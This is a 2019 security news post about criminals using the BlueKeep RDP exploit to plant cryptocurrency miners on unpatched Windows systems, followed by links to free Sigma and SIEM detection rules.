Delaware, USA – November 4, 2019 – Security researchers first discovered the exploitation of BlueKeep vulnerability for malicious purposes. So far, not particularly skilled cybercriminals are using the exploit published several months ago by the Metasploit team to infect unpatched Windows systems with Monero cryptocurrency miners. The campaign began in the second half of October but remained undetected for a couple of weeks. Kevin Beaumont discovered the attacks while checking the logs of honeypots and shared his findings with the cybersecurity community. Marcus Hutchins analyzed the crash dump provided by Kevin and found not only the use of the Metasploit module but also the encrypted PowerShell command to deliver the final payload – a known cryptocurrency miner. The malware does not have worm-like capabilities, so attackers scan the Internet for vulnerable systems, and then upload the list of IPs to the server for further infection.
The detected campaign does not pose a particular threat, but even its detection took two weeks. Perhaps more skilled cybercriminals have exploited this vulnerability for a long time, remaining under the radars of security researchers, since the first scans for vulnerable systems began back in late May, and in the summer it became known that information about the vulnerability was actively shared on Chinese hacker forums to create a working exploit.
You can read the detailed blog post to learn more about creating proactive content that detects attempts to exploit BlueKeep flaw: https://socprime.com/en/blog/proactive-detection-content-cve-2019-0708-vs-attck-sigma-elastic-and-arcsight/
Links to free detection content
Sigma by Markus Neis https://github.com/Neo23x0/sigma/blob/master/rules/windows/sysmon/sysmon_susp_rdp.yml
Sigma by Roman Ranskyi https://tdm.socprime.com/tdm/info/PqEM7DhU0qKB/
Rule pack for Elastic stack, ArcSight, and QRadar: https://tdm.socprime.com/tdm/info/08aL8Ao2P8pk/
Potential RDP exploit CVE-2019-0708 – https://tdm.socprime.com/tdm/info/ukDoTj7K7ZUr/
Scanner PoC for CVE-2019-0708 RDP RCE vuln – https://tdm.socprime.com/tdm/info/dxSqHBcCVylk/